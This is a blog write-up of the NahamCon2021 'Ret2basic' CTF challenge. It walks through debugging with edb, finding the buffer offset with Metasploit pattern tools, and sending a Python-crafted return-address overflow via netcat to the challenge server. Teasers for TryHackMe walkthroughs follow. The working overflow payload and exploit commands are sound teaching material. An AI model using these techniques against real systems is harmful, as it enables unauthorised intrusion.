NahamCon2021 CTF - Ret2basic - Writeup

Introduction

Today we're doing a CTF writeup for the Ret2basic challenge from the NahamCon2021 CTF. Ret2basic is a binary exploit challenge, and after we start the challenge we received a string we can use to interact with the challenge:


We also have to download the binary file associated with the challenge so we can enumerate it. After we download the file, we chmod it to make it executable, then start it up:

chmod +x ret2basic
./ret2basic


Now, in another terminal, we start up edb:

edb


Then from the file tab, we Attach, then select our running ret2basic process.



Now we want to identify the functions in the binary. From the Plugins tab, we select SymbolViewer:


In this list, we can see all of the functions the ret2basic binary calls, as well as their associated memory address. One in particular catches our eye:


This is most likely the function and memory address we want to instruct the RIP register to go to after we find the correct offset buffer to control it. Before we forget, we should start the binary inside of the debugger program:


Next, we'll create a patterned string to send to the buffer using Metasploit tools:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 250


Then paste that patterned string into the terminal with the binary running:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A




The process crashed, but more importantly, EDB reports that the value of the return is 0x6541316541306541, which means that we can feed that value to another Metasploit tool to return our buffer offset value:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x6541316541306541


Now we have a buffer offset value and the address of the binary's function we want to return to. What we want to do is pipe the buffer offset string and the return address of the ret2basic!win function through Netcat. Unfortunately, the address of the function includes bytes which are non-printable in ASCII. Our way around that is to use Python to print a string that includes bytes in hex and pipe that through Netcat to access the ret2basic process running on the CTF server.

We remember that the address of our target function is 0x00401215. In hex-byte format this would be:

\x00\x40\x12\x15

But we also have to remember that memory addresses are in Little Endian format, meaning that the bytes at the right-hand side of the address are entered first. In Little Endian format, our bytes become:

\x15\x12\x40\x00

Now that we're clear on that, we can craft our buffer overflow string using the Python interpreter:

python
'A' * 120 + '\x15\x12\x40\x00'


And finally, we have Python print that string and pipe it to Netcat to communicate with the CTF server and buffer overflow it, triggering the Win function and returning our flag:

python -c “print 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x15\x12@\x00'” | nc challenge.nahamcon.com 30384


 Summary

We were able to enumerate the value of the vulnerable binary's buffer offset through testing and obtained the memory address of the objective binary function through debugging tools. With these two variables, we were able to craft a buffer overflow string using Python and send it's output to the vulnerable binary running on the CTF servers, resulting in the capture of our objective flag string.

Finish








Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more